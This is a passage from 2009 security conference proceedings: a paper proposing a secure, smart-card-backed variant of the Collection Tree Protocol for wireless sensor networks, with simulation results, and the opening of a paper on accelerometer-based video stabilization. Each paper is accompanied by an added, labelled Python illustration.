10. Ku, W.C., Chang, S.T., Chiang, M.H.: Further cryptanalysis of fingerprint-based remote user authentication scheme using smartcards. Electronics Letters 41(5), 240–241 (2005)
11. Lee, J.K., Ryu, S.R., Yoo, K.Y.: Fingerprint-based remote user authentication scheme using smart cards. Electronics Letters 38(12), 554–555 (2002)
12. Lee, S.W., Kim, H.S., Yoo, K.Y.: Improved efficient remote user authentication scheme using smart cards. IEEE Transactions on Communications 50(2), 565–567 (2004)
13. Lin, C.-H., Lai, Y.-Y.: A flexible biometrics remote user authentication scheme. Computer Standards & Interfaces 27(1), 19–23 (2004)
14. Lin, S., Costello, D.J.: Error Control Coding: Fundamentals and Applications. Prentice-Hall, Englewood Cliffs (1983)
15. Monro, D.M., Rakshit, S., Zhang, D.: DCT-based iris recognition. IEEE Trans. Pattern Anal. Mach. Intell. 29(4), 586–595 (2007)
16. Shen, J.J., Lin, C.W., Hwang, M.S.: Security enhancement for the timestamp-based password authentication scheme using smart cards. Computers & Security 22(7), 591–595 (2003)
17. Sun, H.: An efficient remote use authentication scheme using smart cards. IEEE Transactions on Consumer Electronics 46(4), 958–961 (2000)
18. Wildes, R., Asmuth, J.C., Green, G.L., Hsu, S.C., Kolczynski, R.J., Matey, J.R., McBride, S.E.: A machine-vision system for iris recognition. Machine Vision and Applications 9(1), 1–8 (1996)
19. Yang, S., Verbauwhede, I.: Secure iris verification. In: IEEE International Conference on Acoustics, Speech and Signal Processing, ICASSP, pp. II–133–II–136 (2007)
20. Yang, W.H., Shieh, S.P.: Password authentication schemes with smart cards. Computers & Security 18(8), 727–733 (1999)
21. Yoon, E.J., Ryu, E.K., Yoo, K.Y.: An improvement of Hwang-Lee-Tang’s simple remote user authentication schemes. Computers & Security 24(1), 50–56 (2005)
Secure Collection Tree Protocol for Tamper-Resistant Wireless Sensors
Peter Pecho, Jan Nagy, Petr Hanáček, and Martin Drahanský
Brno University of Technology, Faculty of Information Technology, Brno, Czech Republic
{pecho,inagy,hanacek,drahan}@fit.vutbr.cz
Abstract. We propose a modification of the Collection Tree Protocol suitable for wireless sensors with a tamper-resistant module. This platform provides better security; however, ordinary protocols cannot utilize its features. Our goal was to offer a secure routing protocol with behavior and efficiency similar to the original protocol. Both protocols were simulated to show that adding security to protocols does not necessarily lead to higher demands on data transfer and thus power consumption.
Keywords: wireless sensor networks, routing protocol, smart card, tamper-resistant module, security.
1 Introduction
Current research on protocols for wireless sensor networks (WSNs) is mostly concerned with cheap, low-cost sensors without tamper-resistant coverage. It is usually supposed that sensor nodes will not be captured, because current applications are not attractive to attackers. With larger deployment of WSNs, applications processing sensitive data will appear. It is expected that such sensor nodes will be an interesting target for the attacker. Recently, researchers have mostly assumed that tamper-resistant sensor nodes cannot be used for massive applications because of their price, complexity and power consumption. We do not agree with this statement. Our concept of a secure sensor node platform is cheap and provides much better security than recent solutions. This platform is based on a combination of a tamper-vulnerable portion (e.g. common sensor node hardware) and a tamper-resistant portion (e.g. a smart card, or any suitable cryptographic microcontroller) of the sensor node. This platform offers not only accelerated cryptography, but also secure memory, which is not provided by other solutions (e.g. faster and more advanced microcontroller chips). Utilization of ordinary protocols designed for low-cost sensors is not suitable for our platform, as they do not use the security features of the tamper-resistant portion. This platform may also be used by various protocols based on secure hardware. We chose the Collection Tree Protocol (CTP), as one of the simple and widespread protocols. Our goal was to propose a modification of CTP that offers similar efficiency to the original CTP and has some security features.

D. Ślęzak et al. (Eds.): SecTech 2009, CCIS 58, pp. 217–224, 2009. © Springer-Verlag Berlin Heidelberg 2009
2 Wireless Sensors with Tamper-Resistant Module
WSNs are mostly used in a hostile environment; therefore the nodes may be highly vulnerable to any physical manipulation. As the sensor nodes provide many input/output channels together with hidden channels (power consumption, EM emissions, etc.), it is almost impossible to design reliable hardware protection. Tamper-resistant coverage is able to protect the computational core of the node, but attached sensors are still unprotected. Therefore, it is better to define a tamper-resistant sensor node as a sensor node composed of two portions: (1) common sensor node hardware as the tamper-vulnerable portion and (2) a tamper-resistant module. A tamper-resistant module is a peripheral designed to be resistant against physical manipulation. The module is usually equipped with a microprocessor and secure memory, which contains keying material, sensitive data and algorithms. Only these algorithms can manipulate these data [4,5]. A tamper-resistant module cannot be cloned or emulated, because such features cannot simply be replaced by software without special hardware support. The most widely used tamper-resistant device is a smart card. In this paper, we are concerned with contact microprocessor smart cards according to ISO/IEC 7816, as they are freely programmable [6][7]. Smart cards support private- and public-key cryptography and have low power consumption. The subset of supported cryptographic algorithms is defined by the smart card vendor and application area. Today, many smart card types offer RSA; elliptic curve cryptography (ECC), however, is still implemented very rarely. For using sensor nodes with tamper-resistant modules, protocols and schemes have to be redesigned for the following reasons: (1) task distribution between the portions, (2) limited memory and performance of the portions.
3 Collection Tree Protocol
The Collection Tree Protocol (CTP) is a simple tree-based routing protocol proposed for gathering data from sensor nodes into a root node (base station). All communication is of many-to-one or one-to-many type. The nodes form a set of routing trees, whereas multiple root nodes are allowed. The CTP is an address-free protocol. The nodes send data frames to the next hop, whereas the establishment of routes is based on a routing gradient (link quality). The protocol has the following properties [2]:
– The CTP assumes that the link quality is estimated from the number and location of nearby nodes. The estimation is based on the number of transmissions whose acknowledgement is successfully received.
– The CTP has several mechanisms in order to improve delivery reliability, but it does not promise 100% reliability; it is (just) best effort.
– The CTP is designed for relatively low traffic rates. Bandwidth-consuming systems should use a different protocol.
– The CTP uses expected transmissions (ETX) as its routing gradient. A base station (root node) has an ETX of 0. The ETX of other nodes consists of the ETX of their parents and the ETX of the link to these parents. If several routes are available, the CTP should choose the one with the lowest ETX value.

The routes are established during deployment of the nodes. Periodic updates are not taken into account; only inconsistency in the network topology is detected. A loop in the routing path is detected when a node chooses a route with a gradient value significantly higher than its own gradient. This may be caused by losing connectivity with the current parent node. For this issue, the CTP offers two solutions: (1) a beacon frame and (2) ignoring routes with an ETX higher than a reasonable constant. The CTP also provides a handle for frame duplication. When a duplicate instance of a frame is detected during its forwarding, it is dropped.
4 Secure Collection Tree Protocol
The CTP is designed with regard to minimum power consumption and no threats are considered. It does not propose any countermeasure against an attacker, and therefore its usage in real-world applications may be unacceptable. Simple usage of cryptographic mechanisms does not guarantee the security of the protocol either. The Secure Collection Tree Protocol (Secure-CTP) is a modification of CTP suitable for sensor nodes with tamper-resistant modules. This modification considers the task distribution between the tamper-vulnerable and tamper-resistant portions, as well as the non-trustworthy channel between the portions. Our goal was to propose a protocol that offers high networking security at the cost of a small energy overhead.

4.1 General Assumptions
To decrease the power consumption of the sensor node, the smart card is powered up only for cryptographic operations. We suppose that the attacker is able to capture a sensor node and analyze its tamper-vulnerable portion. His knowledge, abilities and available equipment are not sufficient to reveal sensitive data from the tamper-resistant portion. In the worst case, the secure memory will be erased. Some specific applications, such as military sensor networks used for monitoring adversary territory, may have higher requirements; however, devices used in such applications usually have better physical protection and their price is much higher. Thus, we do not consider such applications.

4.2 Protocol Modifications
The Secure-CTP demonstrates how to utilize the security features given by the tamper-resistant portion (smart card). A negative aspect of this sensor node platform is higher production costs. Anyway, current smart cards offer the best benefit-cost ratio [15]. The most significant changes in the Secure-CTP protocol are (1) usage of a unique 16-bit identifier (ID), (2) modified usage of ETX, (3) usage of a Routing Frame Counter and (4) usage of a Message Authentication Code (MAC) that provides integrity and authentication of frames.

Each sensor node has a unique 16-bit ID stored in the smart card. The ID is read-only and is defined during manufacturing of the smart card. Each transmitted frame has the ID of the last-hop sensor and a MAC computed from the frame attached. The smart card also holds the master key (shared by all smart cards in the network) and monotonic counters. The master key never leaves the smart card and may be used only as a parameter of cryptographic routines. This key, together with a node identifier, is used for session key generation, thus the session key never leaves the smart card either.

When a sensor node receives a routing frame with a better routing gradient, the frame is sent to the smart card. Then the link estimation to the sender of this frame is also sent to the smart card. Inside the smart card, a session key is generated from the master key and the source ID of the frame. (Generation of the session key for unicast communication also requires the current node ID.) The session key is used for validation of the MAC of the routing frame. When the authenticity of the routing frame is confirmed, the link estimation is added to the routing gradient and the new routing frame is secured by a MAC. Such a routing frame is then sent back to the sensor node. After that, the new routing frame may be broadcast to the neighbors.

Routing frames are protected by a 32-bit monotonic routing frame counter (RFC). A sensor node accepts only a routing frame with (1) a higher value of the counter, or (2) a lower value, but where the difference is within an allowed range. Routing packets with other counter values are dropped. The recommended allowed range of the RFC is 2^8 up to 2^10. This range enables synchronization if the sensor node has received broken frames because of radio transmission problems. Lower values could cause synchronization problems; higher values could be misused to overflow the counter. A new sensor node added to the network has not received any RFC before. Thus, a special flag inside the secure memory is set to indicate that any RFC from a valid routing frame may be accepted.

The ETX value of the last accepted routing frame is stored in the memory of the tamper-resistant portion and it is incremented in a limited range. This modification, in contrast to the CTP, allows the ETX to be incremented only by 1, 2, or 3 bits (that means 1–2, 1–4, or 1–8), depending on the implementation. We suppose that using more bits for link estimation does not have a significant influence on the routing tree. Root nodes may initiate re-establishment of routing trees. They are the only nodes that can create zero-ETX routing frames. On detection of an inconsistency of the routes, the nodes should inform the root node by sending a beacon frame. This frame has to be protected by a MAC to avoid beacon frame injection. The root node responds to the received inconsistency by sending a routing frame with zero ETX.
4.3 Frame Formats
The communication architecture for networked sensors is mostly based on the Active Messages model [3]. This layer is used as the network layer for the CTP and the Secure-CTP. An active message frame is used for transportation of any higher-level communication. In the Secure-CTP, the following changes were proposed: (1) addition of the RFC and (2) addition of the MAC to the routing frame. In contrast to the CTP, we also defined the addition of the last-hop ID and a short frame counter used for link estimation. In the CTP implementation from the official TinyOS-2.x distribution, a frame counter is also used for the same purpose; it is not, however, mentioned in the specification. The modifications of the routing frame format are shown in Fig. 1(a) and 1(b). The proposed modifications of the CTP are suitable for static networks. If a network graph consists of disjoint graph components and sensor nodes are mobile, various values of the RFC may appear in various components of the graph. Such conditions may be understood as a replay attack. For security reasons, the RFC cannot be reset, and sensors with different RFCs cannot use the same routes to the base station. Moreover, the existence of two ranges of the RFC in the same network may lead to repeated, but useless, updates of routing paths, and that may lead to higher power consumption. Therefore, it is recommended to ignore frames with an RFC value out of the valid range. Fortunately, most sensor networks have a static topology. Thus, migration of nodes between two disjoint networks is rather rare.
Fig. 1. Routing frame format of CTP and Secure-CTP: (a) routing frame format of CTP according to the specification; (b) routing frame format of Secure-CTP
4.4 Security
The considered attacker is only able to reveal sensitive data from the tamper-vulnerable portion of the sensor node, and the cryptographic microcontroller stays secure. If we assume storing the keying material in the secure memory, it is enough to use symmetric cryptography. Data security is provided by symmetric cryptography, as probably all ISO/IEC 7816 smart cards offer 3DES or AES encryption at high speed. The chosen encryption algorithm defines 64-bit data blocks. The key length is 112 bits for 3DES and 128 bits for AES. Integrity of the frames is protected by CBC-MAC. From the 64-bit MAC, only the last 32 bits are used. Frames without a MAC are dropped. There are several possible key distributions, whereas we use a single shared key for the whole network. This key is loaded into the smart card prior to node deployment in a safe environment. At the same time we also generate the unique node identifier. For unicast data frame protection, pair-wise keys are used (1):

$$k_{A \to B} = F(\text{shared key}, id_A, id_B), \qquad k_{B \to A} = F(\text{shared key}, id_B, id_A) \tag{1}$$
The function F may be implemented as a concatenation, hash function, encryption algorithm, another cryptographic operation or a suitable combination of these. The output of this function may be shortened to satisfy the key length requirements of the chosen cryptographic algorithm. As F we recommend the use of concatenation of the values together with the SHA-1 function. The resulting 160-bit digest must be trimmed to a valid key length of 112 bits (3DES) or 128 bits (AES). During broadcast of routing frames, the receiver node ID is unknown. Thus, it is necessary to use only the shared key and the source node ID to generate the broadcast session key (2).

$$k_{broadcast} = F(\text{shared key}, id) \tag{2}$$

When confidentiality of transmitted data is required, it is possible to encrypt only the data field of data frames. The frame header must remain plaintext, as the nodes need to know the recipient of each frame.

4.5 Communication Overhead
The radio subsystem is typically the component with the highest power consumption of all relevant sensor node components. Many recent sensor nodes use the CC2420 Chipcon radio, which has a similar supply current of up to 20 mA in receive and send mode [12]. Thus, each transferred byte has an influence on the network lifetime. The CTP defines routing frames with a length of 5 bytes (+7 bytes of active message envelope and +2 bytes of the link estimation library). This protocol was designed with regard to minimum radio overhead; injecting false or dummy packets may degrade its efficiency. The Secure-CTP routing frame was prolonged to 16 bytes (+7 bytes of active message envelope). Transfer of a Secure-CTP routing frame increases the power consumption by 64% per routing frame.
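The smart-card side of routing frame acceptance from Section 4.2 (MAC check under the broadcast session key, RFC window, bounded ETX increment), the key derivation F of Section 4.4, and the overhead ratio of Section 4.5, as an added example that is not the authors' code. Assumed here, not taken from the paper: the byte layout of the routing frame body, F realised as SHA-1 over the concatenation trimmed to 128 bits (the paper's recommendation), and HMAC-SHA1 truncated to 32 bits standing in for the 3DES/AES CBC-MAC, which the Python standard library does not provide.

```python
# Added example, not from the paper. Assumptions: frame layout below is ours,
# F = SHA-1(concatenation) trimmed to 128 bits, HMAC-SHA1/32 stands in for CBC-MAC.
import hashlib
import hmac
import struct

RFC_WINDOW = 2 ** 8   # allowed backward RFC difference; the paper recommends 2^8 .. 2^10
ETX_BITS = 2          # the link estimate added to ETX is limited to 2 bits, i.e. 1..4
MAC_LEN = 4           # only 32 bits of the MAC are transmitted
KEY_LEN = 16          # session keys trimmed to 128 bits (AES key length)

# Constructed routing-frame body layout: last-hop ID (16 bit), ETX (16 bit),
# routing frame counter RFC (32 bit); the 32-bit MAC follows the body.
HEADER = struct.Struct(">HHI")


def derive_key(shared_key: bytes, *ids: int) -> bytes:
    """F(shared key, id_A[, id_B]): SHA-1 over the concatenation, trimmed to KEY_LEN.
    One id yields the broadcast key (2); two ids yield the directed pair-wise key (1),
    so k_A->B and k_B->A differ because the ids are concatenated in order."""
    material = shared_key + b"".join(struct.pack(">H", i) for i in ids)
    return hashlib.sha1(material).digest()[:KEY_LEN]


def frame_mac(key: bytes, body: bytes) -> bytes:
    # Stand-in for the paper's CBC-MAC: HMAC-SHA1 truncated to 32 bits.
    return hmac.new(key, body, hashlib.sha1).digest()[:MAC_LEN]


def build_routing_frame(shared_key: bytes, node_id: int, etx: int, rfc: int) -> bytes:
    """Routing frame broadcast by node_id, authenticated under its broadcast key."""
    body = HEADER.pack(node_id, etx, rfc)
    return body + frame_mac(derive_key(shared_key, node_id), body)


class SecureNode:
    """State kept inside the tamper-resistant portion: master key, own ID, last
    accepted RFC and ETX. rfc is None until the first valid frame arrives, which
    models the paper's 'accept any RFC' flag of a newly deployed node."""

    def __init__(self, shared_key: bytes, node_id: int):
        self.shared_key = shared_key
        self.node_id = node_id
        self.rfc = None
        self.etx = None

    def rfc_acceptable(self, rfc: int) -> bool:
        if self.rfc is None or rfc > self.rfc:
            return True
        return self.rfc - rfc <= RFC_WINDOW      # lower, but within the allowed range

    def accept_routing_frame(self, frame: bytes, link_estimate: int):
        """Validate a received routing frame. Returns the node's own re-signed
        routing frame to broadcast, or None if the received frame must be dropped."""
        if len(frame) != HEADER.size + MAC_LEN:
            return None                           # frames without a MAC are dropped
        body, tag = frame[:HEADER.size], frame[HEADER.size:]
        src_id, etx, rfc = HEADER.unpack(body)
        expected = frame_mac(derive_key(self.shared_key, src_id), body)
        if not hmac.compare_digest(tag, expected):
            return None                           # forged or corrupted frame
        if not self.rfc_acceptable(rfc):
            return None                           # replayed or out-of-window counter
        # The ETX grows by the link estimate, clamped to the 2-bit range 1..4.
        new_etx = etx + min(max(link_estimate, 1), 2 ** ETX_BITS)
        if self.etx is not None and new_etx >= self.etx:
            return None                           # not a better routing gradient
        self.rfc, self.etx = rfc, new_etx
        return build_routing_frame(self.shared_key, self.node_id, new_etx, rfc)


def routing_overhead_ratio() -> float:
    """Section 4.5 byte counts: CTP 5 + 7 (AM envelope) + 2 (link estimation) bytes,
    Secure-CTP 16 + 7 bytes. Returns the per-routing-frame growth factor (about 1.64)."""
    return (16 + 7) / (5 + 7 + 2)


if __name__ == "__main__":
    key = b"constructed-network-key"                     # constructed sample master key
    node = SecureNode(key, 2)
    root_frame = build_routing_frame(key, 1, 0, 1000)    # root node 1: ETX 0, RFC 1000
    print(node.accept_routing_frame(root_frame, 3) is not None, node.etx, node.rfc)
    print(node.accept_routing_frame(build_routing_frame(key, 1, 0, 700), 1))  # RFC too old
    print(round(routing_overhead_ratio(), 2))
```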
4.6 Simulation Results
The results of the simulation showed that adding security to the CTP has only a small influence on the total received and transmitted bytes. In the case of the CTP, many small frames are transmitted, while in the case of the Secure-CTP a smaller number of larger frames are transmitted. We suppose that this behavior is caused by adding the RFC to the routing frame, thus older routing frames are dropped more often. It was also found that the modified usage of ETX has a minimal effect on the process of routing tree establishment. The length of ETX also has no significant impact on the amount of data, see Table 1.

Table 1. Simulation results of CTP and Secure-CTP

                          50% depl. nodes      90% depl. nodes      100% depl. nodes
Protocol  Total frames    Median    St.dev.    Median    St.dev.    Median    St.dev.
CTP       recv(BF)           689       896        759       935        833       945
          send(BF)            97        96        105        99        110       100
          recv(RF)           323       176      1,531       521      3,288       847
          send(RF)           106        33        398        98        807       218
          Total bytes     16,355    11,988     40,150    19,820     73,110    37,890
S-CTP     recv(BF)         1,868     1,079      2,059     1,149      2,081     1,154
          send(BF)           234       112        260       122        269       122
          recv(RF)           172        75        832       178      3,342     1,252
          send(RF)            82        17        309        39      1,176       415
          Total bytes     27,644    15,505     52,234    25,146    126,973    74,481

5 Conclusion
We have presented the design of the Secure-CTP protocol, based on the simple CTP protocol, for sensor nodes with tamper-resistant modules. The results show that adding security features to protocols does not necessarily lead to higher data transfer demands. The behavior of both protocols during simulation was rather similar; the small variations were caused by random effects. For applications processing sensitive data, a small communication overhead is much more acceptable than exposing the data. Moreover, moving cryptographic operations into specialized hardware may improve power efficiency. The proposed platform may also be suitable for various secure protocols that have not been implemented yet because no proper platform existed. It is expected that other protocols requiring similar secure sensor node platforms will also appear.
Acknowledgment. This research was supported by the Research Plan No. MSM 0021630528 – Security-Oriented Research in Information Technology.
P. Pecho et al.
References
1. TinyOS – an open-source OS for the networked sensor regime, http://www.tinyos.net/
2. Fonseca, R., Gnawali, O., Jamieson, K., Kim, S., Levis, P., Woo, A.: Collection Tree Protocol (CTP), http://www.tinyos.net/tinyos-2.x/doc/txt/tep123.txt
3. Buonadonna, P., Hill, J., Culler, D.: Active Message Communication for Tiny Networked Sensors. In: Proceedings of the 20th Annual Joint Conference of the IEEE Computer and Communications Societies (2001)
4. Anderson, J.P.: Computer Security Technology Planning Study, ESD-TR-73-51, vol. I. ESD/AFSC, Hanscom AFB, Bedford, Mass. (NTIS AD-758 206) (October 1972)
5. Department of Defense: Trusted Computer System Evaluation Criteria, DoD 5200.28-STD. US Department of Defense, December 26 (1985)
6. International Organization for Standardization (ISO): Integrated circuit(s) cards with contacts – part 1: physical characteristics, ISO/IEC 7816-1 (1998)
7. International Organization for Standardization (ISO): Integrated circuit(s) cards with contacts – part 3: electronic signals and transmission protocols, ISO/IEC 7816-3 (1997)
8. FIPS 81: Operational Modes of DES, Federal Information Processing Standards (FIPS) Publication 81, National Bureau of Standards, U.S. Department of Commerce, Washington, D.C.
9. Amin, F., Jahangir, A.H., Rasifard, H.: Analysis of Public-Key Cryptography for Wireless Sensor Networks Security. In: Proceedings of World Academy of Science, Engineering and Technology (2008), ISSN 1307-6884
10. Rankl, W., Effing, W.: Smart Card Handbook, 3rd edn. John Wiley & Sons, Ltd., Chichester (2003)
11. Eschenauer, L., Gligor, V.D.: A Key-Management Scheme for Distributed Sensor Networks. In: Proceedings of the 9th ACM Conference on Computer and Communications Security (2002)
12. Kramer, M., Geraldy, A.: Energy Measurements for MicaZ Node. In: 5. GI/ITG KuVS Fachgespräch Drahtlose Sensornetze, pp. 61–68 (2006)
13. Platon, E., Sei, Y.: Security Software Engineering in Wireless Sensor Networks. In: Progress in Informatics, National Institute of Informatics (2008)
14. ATMEL: ATmega128 Datasheet: 8-bit AVR Microcontroller with 128K Bytes In-System Programmable Flash (2008), http://www.atmel.com/dyn/resources/prod_documents/doc2467.pdf
15. Pecho, P., Zboril Jr., F., Drahansky, M., Hanacek, P.: Agent Platform for Wireless Sensor Network with Support for Cryptographic Protocols. Journal of Universal Computer Science (in press)
Accelerometer Based Digital Video Stabilization for Security Surveillance Systems Martin Drahanský, Filip Orság, and Petr Hanáček Faculty of Information Technology, Brno University of Technology CZ-612 66, Brno, Czech Republic {drahan, orsag, hanacek}@fit.vutbr.cz
Abstract. This paper is devoted to accelerometer based image stabilization for video based security surveillance systems. At the beginning, an introduction to image stabilization is presented. A short description of the current state of common algorithms for image stabilization follows, including our solution with some partial optimizations. At the end, we present a suitable hardware platform with a built-in accelerometer, which is responsible for advanced stabilization.

Keywords: image, stabilization, video-stream, accelerometer, DSP, FPGA.
1 Introduction

Classical security surveillance systems using video cameras are well known. The resolution of such cameras often doesn’t play an important role, but in some cases (especially for military purposes) a high resolution is required. In this situation, not only detection of some movements is expected, but some recognition or tracking is needed as well. The recognition can classify the object into one of predefined categories, i.e. a tank, soldier, ship, civilian, etc. If the object is recognized, the system should be able to track (follow the motion of) this object, so that an automatic storage system always has the tracked object in the middle of the video sequence, or an operator can see this object in the middle of the screen. The placement of the monitoring system plays an important role, especially for the output video stream. If we have a camera with a high resolution and the camera is held in someone’s hand or mounted on a moving object (car, tank etc.), then the resulting video stream is of very poor quality. An optimal solution is to place the camera on a stable holder, but if the height of such a holder is too big, the camera will be exposed to the influences of the surroundings, e.g. wind, asperity of the road, waves on the sea etc. Therefore, image stabilization of the video stream is needed: the significant object is then always in the same position on the screen. We distinguish between two types of camera movements [2]:
• Weak shaking (approx. ±10° variation in the horizontal and vertical directions and/or some small fractions of Hertz)
• Strong shaking (more than ±10° variation in the horizontal and vertical directions and/or tens of Hertz).
D. Ślęzak et al. (Eds.): SecTech 2009, CCIS 58, pp. 225–233, 2009. © Springer-Verlag Berlin Heidelberg 2009
In the first case, the problem with shaking can be solved using pure software (digital) image stabilization. On the other hand, strong shaking is impossible to stabilize with a software solution only, i.e. some additional hardware is needed. This hardware can be based either on a servomotor unit or on a pneumatic/hydraulic unit, which are able to compensate the movements of the camera system in the opposite direction. Such a hardware solution exceeds the scope of this article; however, one solution is introduced here – an accelerometer based solution. Nevertheless, the hardware computing unit for digital image stabilization is described in the third chapter. This hardware unit is composed of two DSP processors with connected FPGAs and SDRAMs. The purpose of this unit is to ensure sufficient computational power for the digital image stabilization algorithm, which is introduced in the following chapter.
2 Image Stabilization Algorithms

Image stabilization algorithms mostly consist of three main parts [2]: motion estimation, motion smoothing and motion compensation. The main task of the first block is to estimate several local motion vectors and, on the basis of these local estimates, to calculate a global motion vector. The second block deals with filtering (or integration) of the estimated global motion vector. The main purpose of this stage is to smooth the calculated value and to prevent large and undesirable differences from the motion vectors calculated in the past. The last block shifts the acquired image in the inverse direction according to the global motion vector. This block can take into account more sophisticated transformations such as rotation or warping. Many different approaches exist nowadays. The main difference lies in the resulting accuracy of the global motion vector and in the algorithm used for estimation of the local motion vectors. We distinguish between pixel and sub-pixel resolution. The second approach is, however, more complicated and more time consuming than the first because an interpolation method is needed, so it is rarely used in real-time applications. Some algorithms consider rotation or more complex warping in addition to translation. We will concentrate on algorithms that use translation with pixel accuracy only. The following section describes a simple plain matching algorithm and some basic ideas of the stabilization. The next section is devoted to one promising algorithm, a modification of which we used.

2.1 Plain Matching Algorithm

As stated above, the algorithms that deal with stabilization are based on estimation of a motion represented by a motion vector [4]. The straightforward solution leads to the use of discrete correlation, or cross-correlation [1]. The discrete correlation produces a matrix of elements. The elements with a high correlation value correspond to the locations where a chosen pattern and the image match well.
It means that the value of an element is a measure of similarity at the relevant point, and we can find locations in an image that are similar to the pattern. The input is formed by a pattern (in the form of an image) F and an input image I. It is not necessary to search the whole image, so a smaller area (search window N×N) is defined. At the same time, this area specifies the maximal shift in the vertical and horizontal direction and is chosen in this manner. Eq. (1) represents a discrete 2D correlation function [4].

Fig. 1. a) Input image with marked search window (left); b) Correlation matrix obtained by correlation (right) [5]
$$ (F \circ I)(x, y) = \sum_{j=-N}^{N} \sum_{i=-N}^{N} F(i, j)\, I(x+i, y+j) \qquad (1) $$
Note that matching according to the first definition is problematic. Correlation can also be high in locations where the image intensity is high, even if it doesn’t match the pattern well. Better performance can be achieved by a normalized correlation [1]:

$$ \frac{\sum_{j=-N}^{N} \sum_{i=-N}^{N} F(i, j)\, I(x+i, y+j)}{\sum_{j=-N}^{N} \sum_{i=-N}^{N} \bigl(I(x+i, y+j)\bigr)^2 \; \sum_{j=-N}^{N} \sum_{i=-N}^{N} F(i, j)^2} \qquad (2) $$
Figure 1 shows an input image, the pattern (small red area) and the correlation matrix obtained by the normalized correlation. We defined the search window (large green area) and the pattern is searched within this window. The result matrix has the same dimensions as the search window (M×M). The pixel with the maximum value determines the position of the pattern in the search window; hence, it determines the position of the area in the search window which is most similar to the pattern. The correlation can be calculated in the original (time) domain according to Eq. (2); however, this approach is rarely used due to its enormous time consumption. Note that for every point of the correlation matrix it is necessary to perform 2N×N multiplications and additions. We can obtain the same result with less effort in the frequency domain [1]. On the other hand, Eq. (2) appears to be an ideal choice from the hardware processing point of view. The computation involves only fixed-point arithmetic (adders and multipliers), which is suitable for an FPGA based implementation. The stated principle is a theoretically ideal solution when we consider only translation. But in practice we have to deal with two problems. The first problem arises from
the finite resolution of registers and sampling, and it causes the existence of several points with maximal values in the correlation matrix. The second problem is the dependency of the results on the background noise which is present in the input video signal. It is necessary (in the case of image stabilization) to define several independent areas and to calculate correlation matrices for each of them. We obtain several local motion vectors, and the global motion vector is calculated as their average or median. This method prevents errors coming from the correlation on problematic areas (e.g. areas with uniform intensity).

2.2 Bit Plane Matching Algorithm
Some algorithms, in a quest to improve the results, calculate the correlation from images passed through an edge detector [3]. This technique provides certain improvements, but edge detectors tend to produce many useless pixels and are sensitive to the image intensity. Last but not least, the detector introduces an additional time-consuming operation to the processing phase. As most edge detectors are nonlinear systems, it is not possible to perform the convolution in the frequency domain. The noise can be suppressed by ignoring the least significant bits. Then we can consider only the higher bits, or take only some bit-planes and calculate the correlation using that plane, which consists only of one and zero values. Better results can be achieved with Gray-coded bit planes. Gray coding allows motion vector estimation using a single bit-plane by encoding most of the useful information into a few planes. A small change in the gray level leads to a small change in the binary digits representing the intensity. The bit plane matching algorithm does not use correlation as defined above, but defines a new, very similar operator (see Eq. (3)) that has to be minimized. Note that, in the previous task, we dealt with maximization. In fact, it is the definition of correlation where the multiplication operator is replaced by the binary operator exclusive or.

$$ E(x, y) = \sum_{j=-N}^{N} \sum_{i=-N}^{N} F(i, j) \oplus I(x+i, y+j) \qquad (3) $$
The local motion vector is obtained by minimizing this error operator. Several (typically four) local motion vectors, one from each area, along with the previous global motion vector are passed through a median operator to produce the current global motion vector estimate. Then, the global motion estimate can optionally be passed through a filter that is tuned to preserve intentional camera motion while removing the undesirable high frequency motion. The final filtered motion estimate is then used for shifting the current frame by an integer number of pixels in the opposite direction of the motion. The whole system is depicted in Figure 2.
Fig. 2. Diagram of digital image stabilization (blocks, in time order: IN → Preprocessing – Gray-Coded Bit Plane → Four Region Motion Estimation (current frame against past frame) → Global Motion Estimation Using Median → Integration → Motion Compensation (Pixel) → OUT)
2.3 Enhancement – Our Solution for Image Stabilization
The method described in the previous section uses only one bit plane to estimate the local motion vector. In order to improve the estimation of the local motion vector, we experimentally determined that at least two bit planes are needed to increase the reliability of the estimation. The next improvement lies in the usage of more than one maximum. This solution will be stable in situations where the edges have very low contrast. Currently we are trying to use the 5 highest maximum peaks in the search area; these could be taken into account in the computation of the global motion vector. The last optimization is to split the image into a predefined number of regions, in which the maxima are searched. The robustness of the algorithm increases with this optimization. Our intention is to reduce the computational demands on the processor (DSP) so that the standalone unit could operate without cooling, and our algorithm should also be stable in regions where nearly no clear edges exist, e.g. desert or sea.
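The bit-plane matching pipeline of Sections 2.2 and 2.3 as an added Python example (not the authors' implementation): Gray-coded bit-plane extraction, the XOR error operator of Eq. (3) minimised per region, the median over four regional vectors plus the previous global vector, and integer-pixel compensation. The frame texture is constructed, the region centres, search radius and bit-plane indices are assumed values, and the `planes` parameter covers the multi-plane enhancement of Section 2.3.

```python
import hashlib
from statistics import median

W = H = 32  # constructed frame size in pixels


def make_texture(seed: bytes = b"frame") -> list:
    """Constructed sample frame: a deterministic pseudorandom 8-bit texture
    (SHA-256 output bytes), so the example runs offline."""
    data = b"".join(hashlib.sha256(seed + bytes([i])).digest()
                    for i in range(W * H // 32))
    return [list(data[y * W:(y + 1) * W]) for y in range(H)]


def shift_frame(img, dx, dy):
    """Simulate camera shake: the content at (x, y) moves to (x+dx, y+dy).
    Wrap-around at the borders keeps the toy example simple."""
    return [[img[(y - dy) % H][(x - dx) % W] for x in range(W)] for y in range(H)]


def gray_code(v: int) -> int:
    """Gray code of an 8-bit intensity: adjacent levels differ in one bit."""
    return v ^ (v >> 1)


def bit_plane(img, k):
    """Bit-plane k (0 = LSB) of the Gray-coded image as 0/1 values."""
    return [[(gray_code(px) >> k) & 1 for px in row] for row in img]


def xor_error(pattern, plane, x, y, N):
    """Eq. (3): E(x, y) = sum_{j=-N..N} sum_{i=-N..N} F(i, j) XOR I(x+i, y+j).
    The pattern F is stored as pattern[j+N][i+N]; each mismatching bit adds 1."""
    return sum(pattern[j + N][i + N] ^ plane[y + j][x + i]
               for j in range(-N, N + 1) for i in range(-N, N + 1))


def local_motion(prev_planes, cur_planes, cx, cy, N, S):
    """Local motion vector of one region: take the (2N+1)x(2N+1) pattern around
    (cx, cy) in the previous frame and return the displacement (dx, dy) inside
    the search window of radius S that minimises E, summed over the planes."""
    patterns = [[[pp[cy + j][cx + i] for i in range(-N, N + 1)]
                 for j in range(-N, N + 1)] for pp in prev_planes]
    best = None
    for dy in range(-S, S + 1):
        for dx in range(-S, S + 1):
            e = sum(xor_error(pat, cp, cx + dx, cy + dy, N)
                    for pat, cp in zip(patterns, cur_planes))
            if best is None or e < best[0]:
                best = (e, dx, dy)
    return best[1], best[2]


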